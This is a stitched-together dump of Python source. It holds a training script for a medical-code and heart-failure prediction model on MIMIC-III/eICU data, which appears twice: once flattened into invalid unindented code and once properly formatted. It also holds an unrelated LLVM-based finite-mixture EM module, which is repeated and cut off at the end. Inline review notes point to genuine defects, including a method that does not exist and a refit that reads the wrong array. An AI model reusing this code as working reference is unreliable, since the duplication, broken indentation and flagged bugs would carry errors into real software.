codes_dataset['test_codes_data'])
(train_hf_y, valid_hf_y, test_hf_y) = hf_dataset['train_hf_y'], hf_dataset['valid_hf_y'], hf_dataset['test_hf_y']
(pretrain_codes_x, pretrain_codes_y, pretrain_y_h, pretrain_visit_lens) = pretrain_codes_data
(train_codes_x, train_codes_y, train_y_h, train_visit_lens) = train_codes_data
(valid_codes_x, valid_codes_y, valid_y_h, valid_visit_lens) = valid_codes_data
(test_codes_x, test_codes_y, test_y_h, test_visit_lens) = test_codes_data
(code_levels, code_levels_pretrain,
subclass_maps, subclass_maps_pretrain,
code_code_adj) = (auxiliary['code_levels'], auxiliary['code_levels_pretrain'],
auxiliary['subclass_maps'], auxiliary['subclass_maps_pretrain'],
auxiliary['code_code_adj'])
op_conf = {
'pretrain': False,
'from_pretrain': True,
'pretrain_path': './saved/hyperbolic/%s/sherbet_a/sherbet_pretrain' % dataset,
'use_embedding_init': True,
'use_hierarchical_decoder': True,
'task': 'h', # m: medical codes, h: heart failure
}
feature_model_conf = {
'code_num': len(code_map_pretrain),
'code_embedding_init': None,
'adj': code_code_adj,
'max_visit_num': train_codes_x.shape[1]
}
pretrain_model_conf = {
'use_hierarchical_decoder': op_conf['use_hierarchical_decoder'],
'subclass_dims': np.max(code_levels_pretrain, axis=0) if op_conf['use_hierarchical_decoder'] else None,
'subclass_maps': subclass_maps_pretrain if op_conf['use_hierarchical_decoder'] else None,
'output_dim': len(code_map_pretrain),
'activation': None
}
task_conf = {
'm': {
'output_dim': len(code_map),
'activation': None,
'loss_fn': medical_codes_loss,
'label': {
'train': train_codes_y.astype(np.float32),
'valid': valid_codes_y.astype(np.float32),
'test': test_codes_y.astype(np.float32)
},
'evaluate_fn': EvaluateCodesCallBack
},
'h': {
'output_dim': 1,
'activation': 'sigmoid',
'loss_fn': 'binary_crossentropy',
'label': {
'train': train_hf_y.astype(np.float32),
'valid': valid_hf_y.astype(np.float32),
'test': test_hf_y.astype(np.float32)
},
'evaluate_fn': EvaluateHFCallBack
}
}
model_conf = {
'use_hierarchical_decoder': False,
'output_dim': task_conf[op_conf['task']]['output_dim'],
'activation': task_conf[op_conf['task']]['activation']
}
hyper_params = {
'code_embedding_size': 128,
'hiddens': [64],
'attention_size_code': 64,
'attention_size_visit': 32,
'patient_size': 64,
'patient_activation': tf.keras.layers.LeakyReLU(),
'pretrain_epoch': 1000,
'pretrain_batch_size': 128,
'epoch': 200,
'batch_size': 32,
'gnn_dropout_rate': 0.8,
'decoder_dropout_rate': 0.17
}
if op_conf['use_embedding_init']:
if op_conf['pretrain'] or (not op_conf['from_pretrain']):
embedding_init = pickle.load(open('./saved/hyperbolic/%s_leaf_embeddings' % dataset, 'rb'))
feature_model_conf['code_embedding_init'] = embedding_init
sherbet_feature = SherbetFeature(feature_model_conf, hyper_params)
if op_conf['pretrain']:
pretrain_x = {
'visit_codes': pretrain_codes_x,
'visit_lens': pretrain_visit_lens
}
if op_conf['use_hierarchical_decoder']:
pretrain_x['y_trues'] = pretrain_y_h
pretrain_y = None
else:
pretrain_y = pretrain_codes_y.astype(np.float32)
init_lr = 1e-2
# split_val = [(20, 1e-3), (150, 1e-4), (500, 1e-5)]
split_val = [(100, 1e-3)]
lr_schedule_fn = lr_decay(total_epoch=hyper_params['epoch'], init_lr=init_lr, split_val=split_val)
lr_scheduler = LearningRateScheduler(lr_schedule_fn)
loss_fn = None if op_conf['use_hierarchical_decoder'] else medical_codes_loss
sherbet_pretrain = Sherbet(sherbet_feature, pretrain_model_conf, hyper_params)
sherbet_pretrain.compile(optimizer='rmsprop', loss=loss_fn)
sherbet_pretrain.fit(x=pretrain_x, y=pretrain_y,
batch_size=hyper_params['pretrain_batch_size'], epochs=hyper_params['pretrain_epoch'],
callbacks=[lr_scheduler])
sherbet_pretrain.save_weights(op_conf['pretrain_path'])
else:
if op_conf['from_pretrain']:
sherbet_pretrain = Sherbet(sherbet_feature, pretrain_model_conf, hyper_params)
sherbet_pretrain.load_weights(op_conf['pretrain_path'])
x = {
'visit_codes': train_codes_x,
'visit_lens': train_visit_lens
}
valid_x = {
'visit_codes': valid_codes_x,
'visit_lens': valid_visit_lens
}
y = task_conf[op_conf['task']]['label']['train']
valid_y = task_conf[op_conf['task']]['label']['valid']
test_y = task_conf[op_conf['task']]['label']['test']
# mimic3 m a, b, c
# init_lr = 1e-2
# split_val = [(20, 1e-3), (35, 1e-4), (100, 1e-5)]
# mimic3 m d, e
# init_lr = 1e-2
# split_val = [(25, 1e-3), (40, 1e-4), (800, 1e-5)]
# mimic3 h a, b, c
init_lr = 1e-2
split_val = [(25, 1e-3), (40, 1e-4), (45, 1e-5)]
# split_val = [(10, 1e-3), (80, 1e-4), (100, 1e-5)]
# mimic3 h d, e
# init_lr = 1e-3
# split_val = [(8, 1e-4), (10, 1e-5), (15, 1e-6)]
# eicu m a, b, c
# init_lr = 1e-2
# split_val = [(50, 1e-3), (60, 1e-4), (100, 1e-5)]
lr_schedule_fn = lr_decay(total_epoch=hyper_params['epoch'], init_lr=init_lr, split_val=split_val)
test_codes_gen = DataGenerator([test_codes_x, test_visit_lens], shuffle=False, batch_size=128)
loss_fn = task_conf[op_conf['task']]['loss_fn']
lr_scheduler = LearningRateScheduler(lr_schedule_fn)
test_callback = task_conf[op_conf['task']]['evaluate_fn'](test_codes_gen, test_y)
sherbet = Sherbet(sherbet_feature, model_conf, hyper_params)
sherbet.compile(optimizer='rmsprop', loss=loss_fn)
history = sherbet.fit(x=x, y=y,
batch_size=hyper_params['batch_size'], epochs=hyper_params['epoch'],
callbacks=[lr_scheduler, test_callback])
sherbet.summary() | train.py | import os
import random
import _pickle as pickle
import tensorflow as tf
from tensorflow.keras.callbacks import LearningRateScheduler
import numpy as np
from models.model import Sherbet, SherbetFeature
from models.loss import medical_codes_loss
from metrics import EvaluateCodesCallBack, EvaluateHFCallBack
from utils import DataGenerator, lr_decay
seed = 6669
random.seed(seed)
np.random.seed(seed)
tf.random.set_seed(seed)
def load_data(dataset_path):
    """Load the preprocessed dataset pickles from *dataset_path*.

    Expects two subdirectories:
      - ``encoded``:  code_maps.pkl
      - ``standard``: pretrain_codes_dataset.pkl, codes_dataset.pkl,
                      heart_failure.pkl, auxiliary.pkl

    Returns:
        (code_maps, pretrain_codes_data, codes_dataset, hf_dataset, auxiliary)
        as unpickled by ``pickle.load``.
    """
    encoded_path = os.path.join(dataset_path, 'encoded')
    standard_path = os.path.join(dataset_path, 'standard')

    def _load(directory, name):
        # Context manager closes the handle even if unpickling raises; the
        # original `pickle.load(open(...))` form leaked file descriptors.
        with open(os.path.join(directory, name), 'rb') as f:
            return pickle.load(f)

    code_maps = _load(encoded_path, 'code_maps.pkl')
    pretrain_codes_data = _load(standard_path, 'pretrain_codes_dataset.pkl')
    codes_dataset = _load(standard_path, 'codes_dataset.pkl')
    hf_dataset = _load(standard_path, 'heart_failure.pkl')
    auxiliary = _load(standard_path, 'auxiliary.pkl')
    return code_maps, pretrain_codes_data, codes_dataset, hf_dataset, auxiliary
if __name__ == '__main__':
    # ---------------- dataset selection & preprocessed inputs ----------------
    dataset = 'mimic3'  # 'mimic3' or 'eicu'
    dataset_path = os.path.join('data', dataset)
    code_maps, pretrain_codes_data, codes_dataset, hf_dataset, auxiliary = load_data(dataset_path)
    code_map, code_map_pretrain = code_maps['code_map'], code_maps['code_map_pretrain']
    (train_codes_data, valid_codes_data, test_codes_data) = (codes_dataset['train_codes_data'],
                                                             codes_dataset['valid_codes_data'],
                                                             codes_dataset['test_codes_data'])
    (train_hf_y, valid_hf_y, test_hf_y) = hf_dataset['train_hf_y'], hf_dataset['valid_hf_y'], hf_dataset['test_hf_y']
    # each *_codes_data tuple unpacks as (codes_x, codes_y, y_h, visit_lens)
    (pretrain_codes_x, pretrain_codes_y, pretrain_y_h, pretrain_visit_lens) = pretrain_codes_data
    (train_codes_x, train_codes_y, train_y_h, train_visit_lens) = train_codes_data
    (valid_codes_x, valid_codes_y, valid_y_h, valid_visit_lens) = valid_codes_data
    (test_codes_x, test_codes_y, test_y_h, test_visit_lens) = test_codes_data
    (code_levels, code_levels_pretrain,
     subclass_maps, subclass_maps_pretrain,
     code_code_adj) = (auxiliary['code_levels'], auxiliary['code_levels_pretrain'],
                       auxiliary['subclass_maps'], auxiliary['subclass_maps_pretrain'],
                       auxiliary['code_code_adj'])
    # ---------------- run configuration ----------------
    op_conf = {
        'pretrain': False,
        'from_pretrain': True,
        'pretrain_path': './saved/hyperbolic/%s/sherbet_a/sherbet_pretrain' % dataset,
        'use_embedding_init': True,
        'use_hierarchical_decoder': True,
        'task': 'h',  # m: medical codes, h: heart failure
    }
    feature_model_conf = {
        'code_num': len(code_map_pretrain),
        'code_embedding_init': None,
        'adj': code_code_adj,
        'max_visit_num': train_codes_x.shape[1]
    }
    pretrain_model_conf = {
        'use_hierarchical_decoder': op_conf['use_hierarchical_decoder'],
        'subclass_dims': np.max(code_levels_pretrain, axis=0) if op_conf['use_hierarchical_decoder'] else None,
        'subclass_maps': subclass_maps_pretrain if op_conf['use_hierarchical_decoder'] else None,
        'output_dim': len(code_map_pretrain),
        'activation': None
    }
    # per-task output head, loss, labels and evaluation callback
    task_conf = {
        'm': {
            'output_dim': len(code_map),
            'activation': None,
            'loss_fn': medical_codes_loss,
            'label': {
                'train': train_codes_y.astype(np.float32),
                'valid': valid_codes_y.astype(np.float32),
                'test': test_codes_y.astype(np.float32)
            },
            'evaluate_fn': EvaluateCodesCallBack
        },
        'h': {
            'output_dim': 1,
            'activation': 'sigmoid',
            'loss_fn': 'binary_crossentropy',
            'label': {
                'train': train_hf_y.astype(np.float32),
                'valid': valid_hf_y.astype(np.float32),
                'test': test_hf_y.astype(np.float32)
            },
            'evaluate_fn': EvaluateHFCallBack
        }
    }
    model_conf = {
        'use_hierarchical_decoder': False,
        'output_dim': task_conf[op_conf['task']]['output_dim'],
        'activation': task_conf[op_conf['task']]['activation']
    }
    hyper_params = {
        'code_embedding_size': 128,
        'hiddens': [64],
        'attention_size_code': 64,
        'attention_size_visit': 32,
        'patient_size': 64,
        'patient_activation': tf.keras.layers.LeakyReLU(),
        'pretrain_epoch': 1000,
        'pretrain_batch_size': 128,
        'epoch': 200,
        'batch_size': 32,
        'gnn_dropout_rate': 0.8,
        'decoder_dropout_rate': 0.17
    }
    # optionally seed the code embeddings from precomputed hyperbolic leaf
    # embeddings (only needed when not restoring from a pretrained checkpoint)
    if op_conf['use_embedding_init']:
        if op_conf['pretrain'] or (not op_conf['from_pretrain']):
            embedding_init = pickle.load(open('./saved/hyperbolic/%s_leaf_embeddings' % dataset, 'rb'))
            feature_model_conf['code_embedding_init'] = embedding_init
    sherbet_feature = SherbetFeature(feature_model_conf, hyper_params)
    if op_conf['pretrain']:
        # ---------------- self-supervised pretraining ----------------
        pretrain_x = {
            'visit_codes': pretrain_codes_x,
            'visit_lens': pretrain_visit_lens
        }
        if op_conf['use_hierarchical_decoder']:
            # hierarchical decoder consumes y_trues as an input and computes
            # its own loss, so no separate target tensor is passed to fit()
            pretrain_x['y_trues'] = pretrain_y_h
            pretrain_y = None
        else:
            pretrain_y = pretrain_codes_y.astype(np.float32)
        init_lr = 1e-2
        # split_val = [(20, 1e-3), (150, 1e-4), (500, 1e-5)]
        split_val = [(100, 1e-3)]
        # NOTE(review): total_epoch uses hyper_params['epoch'] (200) while
        # fit() below runs 'pretrain_epoch' (1000) epochs -- confirm the
        # schedule length is intended.
        lr_schedule_fn = lr_decay(total_epoch=hyper_params['epoch'], init_lr=init_lr, split_val=split_val)
        lr_scheduler = LearningRateScheduler(lr_schedule_fn)
        loss_fn = None if op_conf['use_hierarchical_decoder'] else medical_codes_loss
        sherbet_pretrain = Sherbet(sherbet_feature, pretrain_model_conf, hyper_params)
        sherbet_pretrain.compile(optimizer='rmsprop', loss=loss_fn)
        sherbet_pretrain.fit(x=pretrain_x, y=pretrain_y,
                             batch_size=hyper_params['pretrain_batch_size'], epochs=hyper_params['pretrain_epoch'],
                             callbacks=[lr_scheduler])
        sherbet_pretrain.save_weights(op_conf['pretrain_path'])
    else:
        # ---------------- supervised training / fine-tuning ----------------
        if op_conf['from_pretrain']:
            # loading the checkpoint populates the shared sherbet_feature
            # encoder that the task model below reuses
            sherbet_pretrain = Sherbet(sherbet_feature, pretrain_model_conf, hyper_params)
            sherbet_pretrain.load_weights(op_conf['pretrain_path'])
        x = {
            'visit_codes': train_codes_x,
            'visit_lens': train_visit_lens
        }
        valid_x = {
            'visit_codes': valid_codes_x,
            'visit_lens': valid_visit_lens
        }
        y = task_conf[op_conf['task']]['label']['train']
        valid_y = task_conf[op_conf['task']]['label']['valid']
        test_y = task_conf[op_conf['task']]['label']['test']
        # hand-tuned LR schedules per dataset/task, kept for reference:
        # mimic3 m a, b, c
        # init_lr = 1e-2
        # split_val = [(20, 1e-3), (35, 1e-4), (100, 1e-5)]
        # mimic3 m d, e
        # init_lr = 1e-2
        # split_val = [(25, 1e-3), (40, 1e-4), (800, 1e-5)]
        # mimic3 h a, b, c
        init_lr = 1e-2
        split_val = [(25, 1e-3), (40, 1e-4), (45, 1e-5)]
        # split_val = [(10, 1e-3), (80, 1e-4), (100, 1e-5)]
        # mimic3 h d, e
        # init_lr = 1e-3
        # split_val = [(8, 1e-4), (10, 1e-5), (15, 1e-6)]
        # eicu m a, b, c
        # init_lr = 1e-2
        # split_val = [(50, 1e-3), (60, 1e-4), (100, 1e-5)]
        lr_schedule_fn = lr_decay(total_epoch=hyper_params['epoch'], init_lr=init_lr, split_val=split_val)
        test_codes_gen = DataGenerator([test_codes_x, test_visit_lens], shuffle=False, batch_size=128)
        loss_fn = task_conf[op_conf['task']]['loss_fn']
        lr_scheduler = LearningRateScheduler(lr_schedule_fn)
        test_callback = task_conf[op_conf['task']]['evaluate_fn'](test_codes_gen, test_y)
        sherbet = Sherbet(sherbet_feature, model_conf, hyper_params)
        sherbet.compile(optimizer='rmsprop', loss=loss_fn)
        # NOTE(review): valid_x / valid_y are built above but never passed to
        # fit() -- confirm whether validation_data was intentionally dropped.
        history = sherbet.fit(x=x, y=y,
                              batch_size=hyper_params['batch_size'], epochs=hyper_params['epoch'],
                              callbacks=[lr_scheduler, test_callback])
        sherbet.summary()
# quality_prob: 0.601711  learning_prob: 0.155271
import sys
import numpy
import llvm.core
import qy
from qy import (
get_qy,
Function,
Variable,
StridedArray,
StridedArrays,
)
from llvm.core import (
Type,
Constant,
)
from cargo.log import get_logger
logger = get_logger(__name__)
def log_add_double(x, y):
    """
    Return log(x + y) given log(x) and log(y); see [1].

    [1] Digital Filtering Using Logarithmic Arithmetic.
        Kingsbury and Rayner, 1970.
    """
    # Reuse the cached LLVM function "log_add_d" if this qy module already
    # emitted it; otherwise compile it once via Function.define.
    if "log_add_d" in get_qy().module.global_variables:
        log_add_d = Function.get_named("log_add_d")
    else:
        @Function.define(float, [float, float])
        def log_add_d(x_in, y_in):
            # a = max(x_in, y_in); guards the log1p/exp rearrangement below
            s = x_in >= y_in
            a = qy.select(s, x_in, y_in)

            @qy.if_else(a == -numpy.inf)
            def _(then):
                if then:
                    # both operands are log(0): the sum is still log(0)
                    qy.return_(-numpy.inf)
                else:
                    # log(e^x + e^y) = a + log1p(e^(min(x, y) - a))
                    qy.return_(a + qy.log1p(qy.exp(qy.select(s, y_in, x_in) - a)))

    return log_add_d(x, y)
class FiniteMixture(object):
    """
    An arbitrary finite homogeneous mixture distribution.
    """

    def __init__(self, distribution, K, iterations = 256, convergence = 1e-8):
        """
        Initialize.

        :param distribution: the component distribution shared by all K components
        :param K: number of mixture components
        :param iterations: maximum number of EM iterations
        :param convergence: EM convergence threshold
        """
        self._distribution = distribution
        self._K = K
        self._iterations = iterations
        self._convergence = convergence
        # per-component record: mixture weight "p" plus the component's own
        # parameter record "c"; the pair is replicated K times
        self._parameter_dtype = \
            numpy.dtype((
                [
                    ("p", numpy.float64),
                    ("c", distribution.parameter_dtype),
                ],
                (K,),
            ))
        self._prior_dtype = numpy.dtype((distribution.prior_dtype, (K,)))

    def get_emitter(self):
        """
        Return an IR emitter for this distribution.
        """
        return FiniteMixtureEmitter(self)

    def posterior(self, parameter, samples):
        """
        Return the posterior mixture weights.
        """
        # compute the component likelihoods
        # NOTE(review): "p" is added here as if it were a log-weight, while
        # the IR emitter applies qy.log() to "p" -- confirm the convention.
        post = numpy.ndarray(self.K)

        for i in xrange(self.K):
            ll = parameter[i]["p"]

            for j in xrange(len(samples)):
                ll += self.distribution.ll(parameter[i]["c"], samples[j])

            post[i] = ll

        # normalize and exponentiate
        from cargo.statistics.functions import log_plus_all

        post[:] -= log_plus_all(post)

        numpy.exp(post, post)

        return post

    @property
    def parameter_dtype(self):
        """
        Return the parameter type.
        """
        return self._parameter_dtype

    @property
    def sample_dtype(self):
        """
        Return the sample type.
        """
        return self._distribution.sample_dtype

    @property
    def prior_dtype(self):
        """
        Return the prior type.
        """
        return self._prior_dtype

    @property
    def marginal_dtype(self):
        """
        Return the marginal dtype.
        """
        return self._distribution.average_dtype

    @property
    def K(self):
        """
        The number of mixture components.
        """
        return self._K

    @property
    def distribution(self):
        """
        Return the mixture components.
        """
        return self._distribution
class FiniteMixtureEmitter(object):
    """
    Emit IR for the FiniteMixture distribution.

    Each public method (ll/ml/map/given/marginal) wraps its private
    counterpart in a qy Function.define so the body is compiled once;
    the private methods emit the actual LLVM IR.
    """

    def __init__(self, model):
        """
        Initialize.
        """
        self._model = model
        # IR emitter for the shared component distribution
        self._sub_emitter = self._model.distribution.get_emitter()

    def ll(self, parameter, sample, out):
        """
        Compute finite-mixture log-likelihood.
        """
        @Function.define(
            Type.void(),
            [parameter.data.type_, sample.data.type_, out.type_],
        )
        def finite_mixture_ll(parameter_data, sample_data, out_data):
            self._ll(
                parameter.using(parameter_data),
                sample.using(sample_data),
                out_data,
            )

            qy.return_()

        finite_mixture_ll(parameter.data, sample.data, out)

    def _ll(self, parameter, sample, out):
        """
        Compute finite-mixture log-likelihood.

        Emits log(sum_k p_k * p(sample | component_k)) as a running
        log-sum-exp accumulated in *total*.
        """
        total = qy.stack_allocate(float, -numpy.inf, "total")
        component_ll = qy.stack_allocate(float)

        @qy.for_(self._model._K)
        def _(index):
            component = parameter.at(index)

            self._sub_emitter.ll(
                StridedArray.from_typed_pointer(component.data.gep(0, 1)),
                sample,
                component_ll,
            )

            # total = log_add(total, log(p_k) + component_ll)
            log_add_double(
                total.load(),
                qy.log(component.data.gep(0, 0).load()) + component_ll.load(),
            ) \
            .store(total)

        total.load().store(out)

    def ml(self, samples, weights, out):
        """
        Emit computation of the estimated maximum-likelihood parameter.
        """
        @Function.define(
            Type.void(),
            [samples.data.type_, weights.data.type_, out.data.type_],
        )
        def finite_mixture_ml(samples_data, weights_data, out_data):
            # NOTE(review): self._ml is not defined on this class (see the
            # "XXX def _ml" marker below), so emitting this function raises
            # AttributeError -- confirm whether _ml was meant to exist.
            self._ml(
                samples.using(samples_data),
                weights.using(weights_data),
                out.using(out_data),
            )

        finite_mixture_ml(samples.data, weights.data, out.data)

    # XXX def _ml

    def map(self, prior, samples, weights, out, initializations = 16):
        """
        Emit computation of the estimated MAP parameter.
        """
        @Function.define(
            Type.void(),
            [prior.data.type_, samples.data.type_, weights.data.type_, out.data.type_],
        )
        def finite_mixture_map(prior_data, samples_data, weights_data, out_data):
            self._map(
                prior.using(prior_data),
                samples.using(samples_data),
                weights.using(weights_data),
                out.using(out_data),
                initializations,
            )

        finite_mixture_map(prior.data, samples.data, weights.data, out.data)

    def _map_initialize(self, prior, samples, weights, out, initializations):
        """
        Emit parameter initialization for EM.

        Tries *initializations* random hard assignments of samples to
        components, tracks the assignment with the best total likelihood,
        refits the components, then draws random mixture weights.
        """
        # generate a random initial component assignment
        K = self._model._K
        N = samples.shape[0]

        total = qy.stack_allocate(float)
        best_ll = qy.stack_allocate(float, -numpy.inf)
        assigns = StridedArray.heap_allocated(int, (K,))
        best_assigns = StridedArray.heap_allocated(int, (K,))

        @qy.for_(initializations)
        def _(i):
            @qy.for_(K)
            def _(k):
                # randomly assign the component
                j = qy.random_int(N)
                component = StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1))

                j.store(assigns.at(k).data)

                self._sub_emitter.map(
                    prior.at(k),
                    samples.at(j).envelop(),
                    weights.at(j).envelop(),
                    component,
                )

            # compute our total likelihood
            qy.value_from_any(0.0).store(total)

            @qy.for_(N)
            def _(n):
                sample = samples.at(n)
                # stash the per-sample running sum before reusing *total*
                # as the log-sum-exp accumulator over components
                mixture_ll = total.load()

                qy.value_from_any(-numpy.inf).store(total)

                @qy.for_(K)
                def _(k):
                    component_ll = total.load()

                    self._sub_emitter.ll(
                        StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
                        sample,
                        total,
                    )

                    log_add_double(component_ll, total.load()).store(total)

                (mixture_ll + total.load()).store(total)

            # best observed so far?
            @qy.if_(total.load() >= best_ll.load())
            def _():
                total.load().store(best_ll)

                @qy.for_(K)
                def _(k):
                    assigns.at(k).data.load().store(best_assigns.at(k).data)

        # recompute the best observed assignment
        # NOTE(review): this refit reads *assigns* (the last initialization's
        # assignment), not *best_assigns* -- confirm which was intended.
        @qy.for_(K)
        def _(k):
            j = assigns.at(k).data.load()

            self._sub_emitter.ml(
                samples.at(j).envelop(),
                weights.at(j).envelop(),
                StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
            )

        qy.heap_free(assigns.data)
        qy.heap_free(best_assigns.data)

        # generate random initial component weights
        # NOTE(review): *total* is not reset to zero before accumulating the
        # random weights here; it still holds a likelihood value -- confirm.
        @qy.for_(K)
        def _(k):
            r = qy.random()

            r.store(out.at(k).data.gep(0, 0))

            (total.load() + r).store(total)

        @qy.for_(K)
        def _(k):
            p = out.at(k).data.gep(0, 0)

            (p.load() / total.load()).store(p)

    def _map(self, prior, samples, weights, out, initializations):
        """
        Emit computation of the estimated maximum-likelihood parameter.

        Standard EM: E-step fills a K-by-N responsibility matrix, M-step
        refits components and weights, iterating up to the model's
        configured iteration cap with an L1 termination test.
        """
        # mise en place
        K = self._model._K
        N = samples.shape[0]

        # generate some initial parameters
        self._map_initialize(prior, samples, weights, out, initializations)

        # run EM until convergence
        total = qy.stack_allocate(float)
        component_ll = qy.stack_allocate(float)
        # double-buffered responsibility matrices, swapped each iteration
        this_r_KN = StridedArray.heap_allocated(float, (K, N))
        last_r_KN = StridedArray.heap_allocated(float, (K, N))

        this_r_KN_data = Variable.set_to(this_r_KN.data)
        last_r_KN_data = Variable.set_to(last_r_KN.data)

        @qy.for_(self._model._iterations)
        def _(i):
            # compute responsibilities
            r_KN = this_r_KN.using(this_r_KN_data.value)

            @qy.for_(N)
            def _(n):
                sample = samples.at(n)

                qy.value_from_any(-numpy.inf).store(total)

                @qy.for_(K)
                def _(k):
                    responsibility = r_KN.at(k, n).data

                    self._sub_emitter.ll(
                        StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
                        StridedArray.from_typed_pointer(sample.data),
                        responsibility,
                    )

                    log_add_double(total.load(), responsibility.load()).store(total)

                total_value = total.load()

                @qy.if_else(total_value == -numpy.inf)
                def _(then):
                    if then:
                        # degenerate sample: fall back to uniform responsibility
                        @qy.for_(K)
                        def _(k):
                            qy.value_from_any(1.0 / K).store(r_KN.at(k, n).data)
                    else:
                        # normalize in log space, then exponentiate
                        @qy.for_(K)
                        def _(k):
                            responsibility = r_KN.at(k, n).data

                            qy.exp(responsibility.load() - total_value).store(responsibility)

            # estimate new mixture and component parameters
            @qy.for_(K)
            def _(k):
                component = out.at(k).data

                self._sub_emitter.map(
                    prior.at(k),
                    samples,
                    r_KN.at(k),
                    StridedArray.from_typed_pointer(component.gep(0, 1)),
                )

                qy.value_from_any(0.0).store(total)

                @qy.for_(N)
                def _(n):
                    (total.load() + r_KN.at(k, n).data.load()).store(total)

                # new mixture weight = mean responsibility of component k
                (total.load() / float(N)).store(component.gep(0, 0))

            # check for termination
            last_r_KN = this_r_KN.using(last_r_KN_data.value)

            @qy.if_(i > 0)
            def _():
                # L1 distance between successive responsibility matrices
                # NOTE(review): threshold is hard-coded to 1e-12 rather than
                # using self._model._convergence -- confirm intent.
                qy.value_from_any(0.0).store(total)

                @qy.for_(K)
                def _(k):
                    @qy.for_(N)
                    def _(n):
                        delta = r_KN.at(k, n).data.load() - last_r_KN.at(k, n).data.load()

                        (total.load() + abs(delta)).store(total)

                @qy.if_(total.load() < 1e-12)
                def _():
                    qy.break_()

            total_delta = total.load()

            # swap the responsibility matrices
            temp_r_KN_data_value = this_r_KN_data.value

            this_r_KN_data.set(last_r_KN_data.value)
            last_r_KN_data.set(temp_r_KN_data_value)

            # compute the ll at this step
            @qy.for_(N)
            def _(n):
                sample = samples.at(n)
                total_ll = total.load()

                qy.value_from_any(-numpy.inf).store(total)

                @qy.for_(K)
                def _(k):
                    self._sub_emitter.ll(
                        StridedArray.from_typed_pointer(out.at(k).data.gep(0, 1)),
                        StridedArray.from_typed_pointer(sample.data),
                        component_ll,
                    )

                    log_add_double(
                        total.load(),
                        qy.log(out.at(k).data.gep(0, 0).load()) + component_ll.load(),
                    ) \
                    .store(total)

                (total_ll + total.load()).store(total)

            total_ll = total.load()

            # be informative
            qy.py_printf("after EM step %i: delta %s; ll %s\n", i, total_delta, total_ll)

        # clean up
        qy.heap_free(this_r_KN.data)
        qy.heap_free(last_r_KN.data)

        qy.return_()

    def given(self, parameter, samples, out):
        """
        Compute the conditional distribution.
        """
        @Function.define(
            Type.void(),
            [parameter.data.type_, samples.data.type_, out.data.type_],
        )
        def finite_mixture_given(parameter_data, samples_data, out_data):
            self._given(
                parameter.using(parameter_data),
                samples.using(samples_data),
                out.using(out_data),
            )

            qy.return_()

        finite_mixture_given(parameter.data, samples.data, out.data)

    def _given(self, parameter, samples, out):
        """
        Compute the conditional distribution.

        Updates the mixture weights with each sample's likelihood (Bayes
        rule in log space), then conditions every component on the samples.
        """
        # mise en place
        K = self._model._K
        N = samples.shape[0]

        # compute posterior mixture parameters
        total = qy.stack_allocate(float, -numpy.inf)

        @qy.for_(K)
        def _(k):
            prior_pi = parameter.at(k).data.gep(0, 0)
            prior_parameter = parameter.at(k).data.gep(0, 1)
            posterior_pi = out.at(k).data.gep(0, 0)

            qy.log(prior_pi.load()).store(posterior_pi)

            @qy.for_(N)
            def _(n):
                current_pi = posterior_pi.load()

                self._sub_emitter.ll(
                    StridedArray.from_typed_pointer(prior_parameter),
                    samples.at(n),
                    posterior_pi,
                )

                (current_pi + posterior_pi.load()).store(posterior_pi)

            log_add_double(total.load(), posterior_pi.load()).store(total)

        total_value = total.load()

        @qy.for_(K)
        def _(k):
            posterior_pi = out.at(k).data.gep(0, 0)
            normalized_pi = posterior_pi.load() - total_value

            qy.exp(normalized_pi).store(posterior_pi)

        # compute posterior component parameters
        @qy.for_(K)
        def _(k):
            prior_parameter = parameter.at(k).data.gep(0, 1)
            posterior_parameter = out.at(k).data.gep(0, 1)

            self._sub_emitter.given(
                StridedArray.from_typed_pointer(prior_parameter),
                samples,
                StridedArray.from_typed_pointer(posterior_parameter),
            )

    def marginal(self, parameter, out):
        """
        Compute the marginal distribution.
        """
        @Function.define(
            Type.void(),
            [parameter.data.type_, out.data.type_],
        )
        def finite_mixture_marginal(parameter_data, out_data):
            self._marginal(
                parameter.using(parameter_data),
                out.using(out_data),
            )

        finite_mixture_marginal(parameter.data, out.data)

    def _marginal(self, parameter, out):
        """
        Compute the marginal distribution.
        """
        # averages the component parameters, weighted by mixture weight "p"
        self._sub_emitter.average(
            parameter.extract(0, 0),
            parameter.extract(0, 1),
            out,
        )
        qy.return_()
# --- file: src/python/cargo/statistics/mixture.py ---
import sys
import numpy
import llvm.core
import qy
from qy import (
get_qy,
Function,
Variable,
StridedArray,
StridedArrays,
)
from llvm.core import (
Type,
Constant,
)
from cargo.log import get_logger
logger = get_logger(__name__)
def log_add_double(x, y):
    """
    Return log(x + y) given log(x) and log(y); see [1].

    [1] Digital Filtering Using Logarithmic Arithmetic.
        Kingsbury and Rayner, 1970.
    """
    # Reuse the cached LLVM function "log_add_d" if this qy module already
    # emitted it; otherwise compile it once via Function.define.
    if "log_add_d" in get_qy().module.global_variables:
        log_add_d = Function.get_named("log_add_d")
    else:
        @Function.define(float, [float, float])
        def log_add_d(x_in, y_in):
            # a = max(x_in, y_in); guards the log1p/exp rearrangement below
            s = x_in >= y_in
            a = qy.select(s, x_in, y_in)

            @qy.if_else(a == -numpy.inf)
            def _(then):
                if then:
                    # both operands are log(0): the sum is still log(0)
                    qy.return_(-numpy.inf)
                else:
                    # log(e^x + e^y) = a + log1p(e^(min(x, y) - a))
                    qy.return_(a + qy.log1p(qy.exp(qy.select(s, y_in, x_in) - a)))

    return log_add_d(x, y)
class FiniteMixture(object):
    """
    An arbitrary finite homogeneous mixture distribution.
    """

    def __init__(self, distribution, K, iterations = 256, convergence = 1e-8):
        """
        Initialize.

        :param distribution: the component distribution shared by all K components
        :param K: number of mixture components
        :param iterations: maximum number of EM iterations
        :param convergence: EM convergence threshold
        """
        self._distribution = distribution
        self._K = K
        self._iterations = iterations
        self._convergence = convergence
        # per-component record: mixture weight "p" plus the component's own
        # parameter record "c"; the pair is replicated K times
        self._parameter_dtype = \
            numpy.dtype((
                [
                    ("p", numpy.float64),
                    ("c", distribution.parameter_dtype),
                ],
                (K,),
            ))
        self._prior_dtype = numpy.dtype((distribution.prior_dtype, (K,)))

    def get_emitter(self):
        """
        Return an IR emitter for this distribution.
        """
        return FiniteMixtureEmitter(self)

    def posterior(self, parameter, samples):
        """
        Return the posterior mixture weights.
        """
        # compute the component likelihoods
        # NOTE(review): "p" is added here as if it were a log-weight, while
        # the IR emitter applies qy.log() to "p" -- confirm the convention.
